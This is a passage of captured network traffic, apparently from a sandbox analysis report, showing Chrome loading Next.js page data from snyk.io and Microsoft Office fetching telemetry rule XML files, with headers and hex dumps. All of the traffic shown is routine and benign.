                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:16 UTC15762INData Raw: 30 30 30 30 43 30 30 30 0d 0a 7b 22 70 61 67 65 50 72 6f 70 73 22 3a 7b 22 70 61 67 65 22 3a 7b 22 6d 65 74 61 64 61 74 61 22 3a 7b 22 74 61 67 73 22 3a 5b 5d 2c 22 63 6f 6e 63 65 70 74 73 22 3a 5b 5d 7d 2c 22 73 79 73 22 3a 7b 22 73 70 61 63 65 22 3a 7b 22 73 79 73 22 3a 7b 22 74 79 70 65 22 3a 22 4c 69 6e 6b 22 2c 22 6c 69 6e 6b 54 79 70 65 22 3a 22 53 70 61 63 65 22 2c 22 69 64 22 3a 22 6f 79 72 62 72 69 34 33 61 64 7a 7a 22 7d 7d 2c 22 69 64 22 3a 22 34 6f 6a 46 38 70 56 72 65 61 4c 4a 53 4b 44 31 78 59 76 32 63 6d 22 2c 22 74 79 70 65 22 3a 22 45 6e 74 72 79 22 2c 22 63 72 65 61 74 65 64 41 74 22 3a 22 32 30 32 32 2d 31 31 2d 31 34 54 32 33 3a 31 31 3a 30 30 2e 30 34 39 5a 22 2c 22 75 70 64 61 74 65 64 41 74 22 3a 22 32 30 32 34 2d 30 35 2d 30 31 54
                                                                                                                                                                                                                                                                                                              Data Ascii: 0000C000{"pageProps":{"page":{"metadata":{"tags":[],"concepts":[]},"sys":{"space":{"sys":{"type":"Link","linkType":"Space","id":"oyrbri43adzz"}},"id":"4ojF8pVreaLJSKD1xYv2cm","type":"Entry","createdAt":"2022-11-14T23:11:00.049Z","updatedAt":"2024-05-01T
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:16 UTC15999INData Raw: 22 7d 7d 2c 22 70 75 62 6c 69 73 68 65 64 56 65 72 73 69 6f 6e 22 3a 32 2c 22 72 65 76 69 73 69 6f 6e 22 3a 31 2c 22 63 6f 6e 74 65 6e 74 54 79 70 65 22 3a 7b 22 73 79 73 22 3a 7b 22 74 79 70 65 22 3a 22 4c 69 6e 6b 22 2c 22 6c 69 6e 6b 54 79 70 65 22 3a 22 43 6f 6e 74 65 6e 74 54 79 70 65 22 2c 22 69 64 22 3a 22 6d 6f 6c 65 63 75 6c 65 4d 65 64 69 61 43 61 72 64 22 7d 7d 2c 22 6c 6f 63 61 6c 65 22 3a 22 65 6e 2d 55 53 22 7d 2c 22 66 69 65 6c 64 73 22 3a 7b 22 69 6e 74 65 72 6e 61 6c 4e 61 6d 65 22 3a 22 5c 22 41 74 6c 61 73 73 69 61 6e 5c 22 20 2d 20 6d 65 64 69 61 20 63 61 72 64 22 2c 22 6c 6f 67 6f 22 3a 5b 7b 22 75 72 6c 22 3a 22 68 74 74 70 3a 2f 2f 72 65 73 2e 63 6c 6f 75 64 69 6e 61 72 79 2e 63 6f 6d 2f 73 6e 79 6b 2f 69 6d 61 67 65 2f 75 70 6c 6f
                                                                                                                                                                                                                                                                                                              Data Ascii: "}},"publishedVersion":2,"revision":1,"contentType":{"sys":{"type":"Link","linkType":"ContentType","id":"moleculeMediaCard"}},"locale":"en-US"},"fields":{"internalName":"\"Atlassian\" - media card","logo":[{"url":"http://res.cloudinary.com/snyk/image/uplo
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:16 UTC16384INData Raw: 52 44 4e 49 69 35 6c 45 5a 66 69 6e 78 22 2c 22 5f 5f 74 79 70 65 6e 61 6d 65 22 3a 22 53 79 73 22 7d 2c 22 5f 5f 74 79 70 65 6e 61 6d 65 22 3a 22 43 6f 6e 74 65 6e 74 4e 61 76 69 67 61 74 69 6f 6e 49 74 65 6d 22 2c 22 6c 61 62 65 6c 22 3a 22 43 6f 64 65 20 43 68 65 63 6b 65 72 22 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 6e 75 6c 6c 2c 22 75 72 6c 22 3a 22 2f 63 6f 64 65 2d 63 68 65 63 6b 65 72 2f 22 2c 22 61 70 70 65 61 72 61 6e 63 65 22 3a 7b 22 6e 61 76 49 74 65 6d 22 3a 7b 22 69 63 6f 6e 22 3a 22 69 6e 66 6f 2d 73 63 61 6e 22 7d 7d 7d 5d 7d 7d 2c 7b 22 73 79 73 22 3a 7b 22 69 64 22 3a 22 32 4b 59 73 39 4a 39 32 37 51 68 55 69 34 4d 31 7a 61 67 68 4f 4b 22 2c 22 5f 5f 74 79 70 65 6e 61 6d 65 22 3a 22 53 79 73 22 7d 2c 22 5f 5f 74 79 70 65 6e 61 6d
                                                                                                                                                                                                                                                                                                              Data Ascii: RDNIi5lEZfinx","__typename":"Sys"},"__typename":"ContentNavigationItem","label":"Code Checker","description":null,"url":"/code-checker/","appearance":{"navItem":{"icon":"info-scan"}}}]}},{"sys":{"id":"2KYs9J927QhUi4M1zaghOK","__typename":"Sys"},"__typenam
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:16 UTC1019INData Raw: 64 22 3a 22 31 46 64 46 46 77 6f 4f 31 53 67 34 35 57 7a 71 32 4e 34 78 6f 67 22 2c 22 5f 5f 74 79 70 65 6e 61 6d 65 22 3a 22 53 79 73 22 7d 2c 22 5f 5f 74 79 70 65 6e 61 6d 65 22 3a 22 43 6f 6e 74 65 6e 74 4e 61 76 69 67 61 74 69 6f 6e 49 74 65 6d 22 2c 22 75 72 6c 22 3a 22 2f 70 6f 6c 69 63 69 65 73 2f 77 65 62 73 69 74 65 2d 74 65 72 6d 73 2d 6f 66 2d 75 73 65 22 2c 22 6c 61 62 65 6c 22 3a 22 57 65 62 73 69 74 65 20 54 65 72 6d 73 20 6f 66 20 55 73 65 22 7d 2c 7b 22 73 79 73 22 3a 7b 22 69 64 22 3a 22 34 61 34 71 58 78 31 6f 62 58 52 32 52 62 4b 4c 67 45 71 35 35 31 22 2c 22 5f 5f 74 79 70 65 6e 61 6d 65 22 3a 22 53 79 73 22 7d 2c 22 5f 5f 74 79 70 65 6e 61 6d 65 22 3a 22 43 6f 6e 74 65 6e 74 4e 61 76 69 67 61 74 69 6f 6e 49 74 65 6d 22 2c 22 75 72 6c
                                                                                                                                                                                                                                                                                                              Data Ascii: d":"1FdFFwoO1Sg45Wzq2N4xog","__typename":"Sys"},"__typename":"ContentNavigationItem","url":"/policies/website-terms-of-use","label":"Website Terms of Use"},{"sys":{"id":"4a4qXx1obXR2RbKLgEq551","__typename":"Sys"},"__typename":"ContentNavigationItem","url
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:16 UTC3661INData Raw: 30 30 30 30 30 45 34 31 0d 0a 22 7d 2c 22 5f 5f 74 79 70 65 6e 61 6d 65 22 3a 22 43 6f 6e 74 65 6e 74 4e 61 76 69 67 61 74 69 6f 6e 49 74 65 6d 22 2c 22 6c 61 62 65 6c 22 3a 22 50 72 69 63 69 6e 67 22 2c 22 75 72 6c 22 3a 22 2f 70 6c 61 6e 73 2f 22 7d 5d 7d 7d 2c 7b 22 73 79 73 22 3a 7b 22 69 64 22 3a 22 34 4d 77 68 31 33 42 57 50 73 35 6f 4e 76 51 62 75 4f 41 72 69 30 22 2c 22 5f 5f 74 79 70 65 6e 61 6d 65 22 3a 22 53 79 73 22 7d 2c 22 5f 5f 74 79 70 65 6e 61 6d 65 22 3a 22 4e 61 76 69 67 61 74 69 6f 6e 46 6f 6f 74 65 72 43 61 74 65 67 6f 72 79 22 2c 22 6c 61 62 65 6c 22 3a 22 4f 75 72 20 52 65 73 6f 75 72 63 65 73 22 2c 22 66 6f 6f 74 65 72 4e 61 76 49 74 65 6d 73 22 3a 7b 22 5f 5f 74 79 70 65 6e 61 6d 65 22 3a 22 4e 61 76 69 67 61 74 69 6f 6e 46 6f 6f
                                                                                                                                                                                                                                                                                                              Data Ascii: 00000E41"},"__typename":"ContentNavigationItem","label":"Pricing","url":"/plans/"}]}},{"sys":{"id":"4Mwh13BWPs5oNvQbuOAri0","__typename":"Sys"},"__typename":"NavigationFooterCategory","label":"Our Resources","footerNavItems":{"__typename":"NavigationFoo
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:16 UTC12INData Raw: 30 30 30 30 30 30 30 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                              Data Ascii: 00000000


                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                              141192.168.2.54990013.107.246.60443
                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:15 UTC192OUTGET /rules/rule120637v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:16 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                              Date: Thu, 24 Oct 2024 19:49:15 GMT
                                                                                                                                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                                                                                                                                              Content-Length: 427
                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:26:12 GMT
                                                                                                                                                                                                                                                                                                              ETag: "0x8DC582BA909FA21"
                                                                                                                                                                                                                                                                                                              x-ms-request-id: e3c75742-001e-0014-79f3-245151000000
                                                                                                                                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                              x-azure-ref: 20241024T194915Z-r197bdfb6b4kkrkjudg185sarw000000026000000000vmvw
                                                                                                                                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:16 UTC427INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 50 70 5d 5b 41 61 5d 5b 4e 6e 5d 5b 41 61 5d 5b 53 73 5d 5b 4f 6f 5d 5b 4e 6e 5d 5b 49 69 5d 5b 43 63 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20
                                                                                                                                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120637" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120635" /> <SR T="2" R="([Pp][Aa][Nn][Aa][Ss][Oo][Nn][Ii][Cc])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"


                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                              142192.168.2.54990423.45.111.1604434724C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:16 UTC438OUTGET /_next/data/Cp4abAN54CGUdTYwS0J62/en-US/customer-resources.json?slug=customer-resources HTTP/1.1
                                                                                                                                                                                                                                                                                                              Host: snyk.io
                                                                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                              Cookie: user_utm={}
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:16 UTC595INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                              Cache-Control: public, max-age=0, must-revalidate
                                                                                                                                                                                                                                                                                                              Content-Type: application/json
                                                                                                                                                                                                                                                                                                              ETag: W/"16oc87j7skcymp"
                                                                                                                                                                                                                                                                                                              Server: Vercel
                                                                                                                                                                                                                                                                                                              X-Matched-Path: /_next/data/Cp4abAN54CGUdTYwS0J62/en-US/customer-resources.json
                                                                                                                                                                                                                                                                                                              X-Vercel-Cache: STALE
                                                                                                                                                                                                                                                                                                              X-Vercel-Id: fra1::iad1::vnnhp-1729799356316-b2ca2be385ae
                                                                                                                                                                                                                                                                                                              Date: Thu, 24 Oct 2024 19:49:16 GMT
                                                                                                                                                                                                                                                                                                              Content-Length: 44888
                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                              X-Xss-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                                              Strict-Transport-Security: max-age=31536000; preload
                                                                                                                                                                                                                                                                                                              Akamai-Cache-Status: NotCacheable from child
                                                                                                                                                                                                                                                                                                              Akamai-GRN: 0.42284317.1729799356.1096555
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:16 UTC15789INData Raw: 7b 22 70 61 67 65 50 72 6f 70 73 22 3a 7b 22 70 61 67 65 22 3a 7b 22 6d 65 74 61 64 61 74 61 22 3a 7b 22 74 61 67 73 22 3a 5b 5d 2c 22 63 6f 6e 63 65 70 74 73 22 3a 5b 5d 7d 2c 22 73 79 73 22 3a 7b 22 73 70 61 63 65 22 3a 7b 22 73 79 73 22 3a 7b 22 74 79 70 65 22 3a 22 4c 69 6e 6b 22 2c 22 6c 69 6e 6b 54 79 70 65 22 3a 22 53 70 61 63 65 22 2c 22 69 64 22 3a 22 6f 79 72 62 72 69 34 33 61 64 7a 7a 22 7d 7d 2c 22 69 64 22 3a 22 32 7a 45 52 67 6b 31 4b 30 77 31 34 35 38 4b 36 37 7a 6c 38 5a 7a 22 2c 22 74 79 70 65 22 3a 22 45 6e 74 72 79 22 2c 22 63 72 65 61 74 65 64 41 74 22 3a 22 32 30 32 34 2d 30 32 2d 30 38 54 31 33 3a 34 36 3a 31 30 2e 33 31 35 5a 22 2c 22 75 70 64 61 74 65 64 41 74 22 3a 22 32 30 32 34 2d 30 34 2d 31 37 54 31 37 3a 34 34 3a 33 30 2e 39
                                                                                                                                                                                                                                                                                                              Data Ascii: {"pageProps":{"page":{"metadata":{"tags":[],"concepts":[]},"sys":{"space":{"sys":{"type":"Link","linkType":"Space","id":"oyrbri43adzz"}},"id":"2zERgk1K0w1458K67zl8Zz","type":"Entry","createdAt":"2024-02-08T13:46:10.315Z","updatedAt":"2024-04-17T17:44:30.9
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:16 UTC8787INData Raw: 66 6f 72 20 64 65 76 65 6c 6f 70 65 72 73 20 6e 65 77 20 74 6f 20 53 6e 79 6b 20 74 6f 20 6c 65 61 72 6e 20 68 6f 77 20 74 6f 20 69 6e 74 65 67 72 61 74 65 20 53 6e 79 6b 20 69 6e 74 6f 20 74 68 65 69 72 20 64 65 76 65 6c 6f 70 6d 65 6e 74 20 77 6f 72 6b 66 6c 6f 77 2e 22 2c 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 2f 2f 67 6f 2e 73 6e 79 6b 2e 69 6f 2f 32 30 32 34 2d 64 65 76 2d 6f 6e 62 6f 61 72 64 69 6e 67 2e 68 74 6d 6c 22 2c 22 6c 69 6e 6b 4c 61 62 65 6c 22 3a 22 57 61 74 63 68 20 6e 6f 77 22 7d 7d 5d 2c 22 61 70 70 65 61 72 61 6e 63 65 22 3a 7b 22 6d 65 64 69 61 43 61 72 64 47 72 69 64 22 3a 7b 22 6d 61 78 43 6f 6c 73 22 3a 22 34 22 7d 7d 7d 7d 5d 2c 22 66 6f 6f 74 65 72 43 74 61 22 3a 7b 22 6d 65 74 61 64 61 74 61 22 3a 7b 22 74 61 67 73 22 3a 5b 5d
                                                                                                                                                                                                                                                                                                              Data Ascii: for developers new to Snyk to learn how to integrate Snyk into their development workflow.","url":"https://go.snyk.io/2024-dev-onboarding.html","linkLabel":"Watch now"}}],"appearance":{"mediaCardGrid":{"maxCols":"4"}}}}],"footerCta":{"metadata":{"tags":[]
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:16 UTC16384INData Raw: 5f 74 79 70 65 6e 61 6d 65 22 3a 22 43 6f 6e 74 65 6e 74 4e 61 76 69 67 61 74 69 6f 6e 49 74 65 6d 22 2c 22 6c 61 62 65 6c 22 3a 22 53 6e 79 6b 20 66 6f 72 20 67 6f 76 65 72 6e 6d 65 6e 74 22 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 6e 75 6c 6c 2c 22 75 72 6c 22 3a 22 2f 67 6f 76 65 72 6e 6d 65 6e 74 2d 73 65 63 75 72 69 74 79 2d 73 6f 6c 75 74 69 6f 6e 2f 22 2c 22 61 70 70 65 61 72 61 6e 63 65 22 3a 7b 22 6e 61 76 49 74 65 6d 22 3a 7b 22 69 63 6f 6e 22 3a 22 67 6f 76 65 72 6e 6d 65 6e 74 22 7d 7d 7d 2c 7b 22 73 79 73 22 3a 7b 22 69 64 22 3a 22 32 6b 59 75 72 4e 6d 6e 79 41 54 34 43 43 62 45 47 70 43 62 30 39 22 2c 22 5f 5f 74 79 70 65 6e 61 6d 65 22 3a 22 53 79 73 22 7d 2c 22 5f 5f 74 79 70 65 6e 61 6d 65 22 3a 22 43 6f 6e 74 65 6e 74 4e 61 76 69 67
                                                                                                                                                                                                                                                                                                              Data Ascii: _typename":"ContentNavigationItem","label":"Snyk for government","description":null,"url":"/government-security-solution/","appearance":{"navItem":{"icon":"government"}}},{"sys":{"id":"2kYurNmnyAT4CCbEGpCb09","__typename":"Sys"},"__typename":"ContentNavig
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:16 UTC3928INData Raw: 6d 65 22 3a 22 43 6f 6e 74 65 6e 74 4e 61 76 69 67 61 74 69 6f 6e 49 74 65 6d 22 2c 22 6c 61 62 65 6c 22 3a 22 57 68 61 74 20 69 73 20 53 6e 79 6b 3f 22 2c 22 75 72 6c 22 3a 22 2f 70 72 6f 64 75 63 74 2f 22 7d 2c 7b 22 73 79 73 22 3a 7b 22 69 64 22 3a 22 31 49 35 51 62 53 41 76 58 68 6a 44 44 4f 5a 72 63 77 62 76 71 6e 22 2c 22 5f 5f 74 79 70 65 6e 61 6d 65 22 3a 22 53 79 73 22 7d 2c 22 5f 5f 74 79 70 65 6e 61 6d 65 22 3a 22 43 6f 6e 74 65 6e 74 4e 61 76 69 67 61 74 69 6f 6e 49 74 65 6d 22 2c 22 6c 61 62 65 6c 22 3a 22 44 65 76 65 6c 6f 70 65 72 20 53 65 63 75 72 69 74 79 20 50 6c 61 74 66 6f 72 6d 22 2c 22 75 72 6c 22 3a 22 2f 70 6c 61 74 66 6f 72 6d 2f 22 7d 2c 7b 22 73 79 73 22 3a 7b 22 69 64 22 3a 22 34 65 41 6b 48 59 36 51 7a 56 50 5a 66 35 66 50 30
                                                                                                                                                                                                                                                                                                              Data Ascii: me":"ContentNavigationItem","label":"What is Snyk?","url":"/product/"},{"sys":{"id":"1I5QbSAvXhjDDOZrcwbvqn","__typename":"Sys"},"__typename":"ContentNavigationItem","label":"Developer Security Platform","url":"/platform/"},{"sys":{"id":"4eAkHY6QzVPZf5fP0


                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                              143192.168.2.54990623.77.250.634434724C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:16 UTC608OUTGET /_next/data/Cp4abAN54CGUdTYwS0J62/en-US/case-studies.json HTTP/1.1
                                                                                                                                                                                                                                                                                                              Host: snyk.io
                                                                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                              purpose: prefetch
                                                                                                                                                                                                                                                                                                              x-nextjs-data: 1
                                                                                                                                                                                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                              x-middleware-prefetch: 1
                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                              Cookie: user_utm={}
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:16 UTC503INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                              Cache-Control: private, no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                                                                                                                                              Server: Vercel
                                                                                                                                                                                                                                                                                                              X-Matched-Path: /en-US/case-studies
                                                                                                                                                                                                                                                                                                              X-Middleware-Skip: 1
                                                                                                                                                                                                                                                                                                              X-Vercel-Id: arn1::tx7k7-1729799356358-3a842255bedc
                                                                                                                                                                                                                                                                                                              Date: Thu, 24 Oct 2024 19:49:16 GMT
                                                                                                                                                                                                                                                                                                              Content-Length: 3
                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                              X-Xss-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                                              Strict-Transport-Security: max-age=31536000; preload
                                                                                                                                                                                                                                                                                                              Akamai-Cache-Status: NotCacheable from child
                                                                                                                                                                                                                                                                                                              Akamai-GRN: 0.5a1d4117.1729799356.1f617fe
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:16 UTC3INData Raw: 7b 7d 0a
                                                                                                                                                                                                                                                                                                              Data Ascii: {}


                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                              144192.168.2.54991013.107.246.60443
                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:16 UTC192OUTGET /rules/rule120640v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:16 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                              Date: Thu, 24 Oct 2024 19:49:16 GMT
                                                                                                                                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                                                                                                                                              Content-Length: 478
                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:25:48 GMT
                                                                                                                                                                                                                                                                                                              ETag: "0x8DC582B9B233827"
                                                                                                                                                                                                                                                                                                              x-ms-request-id: 2044f02f-601e-0001-42eb-25faeb000000
                                                                                                                                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                              x-azure-ref: 20241024T194916Z-16849878b78lhh9t0fb3392enw000000081000000000mxek
                                                                                                                                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                              X-Cache-Info: L1_T2
                                                                                                                                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:16 UTC478INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120640" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120639" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                              145192.168.2.54990723.77.250.634434724C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:16 UTC600OUTGET /_next/data/Cp4abAN54CGUdTYwS0J62/en-US/news.json HTTP/1.1
                                                                                                                                                                                                                                                                                                              Host: snyk.io
                                                                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                              purpose: prefetch
                                                                                                                                                                                                                                                                                                              x-nextjs-data: 1
                                                                                                                                                                                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                              x-middleware-prefetch: 1
                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                              Cookie: user_utm={}
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:16 UTC495INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                              Cache-Control: private, no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                                                                                                                                              Server: Vercel
                                                                                                                                                                                                                                                                                                              X-Matched-Path: /en-US/news
                                                                                                                                                                                                                                                                                                              X-Middleware-Skip: 1
                                                                                                                                                                                                                                                                                                              X-Vercel-Id: arn1::sx2lj-1729799356397-fc67463c46da
                                                                                                                                                                                                                                                                                                              Date: Thu, 24 Oct 2024 19:49:16 GMT
                                                                                                                                                                                                                                                                                                              Content-Length: 3
                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                              X-Xss-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                                              Strict-Transport-Security: max-age=31536000; preload
                                                                                                                                                                                                                                                                                                              Akamai-Cache-Status: NotCacheable from child
                                                                                                                                                                                                                                                                                                              Akamai-GRN: 0.5a1d4117.1729799356.1f61807
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:16 UTC3INData Raw: 7b 7d 0a
                                                                                                                                                                                                                                                                                                              Data Ascii: {}


                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
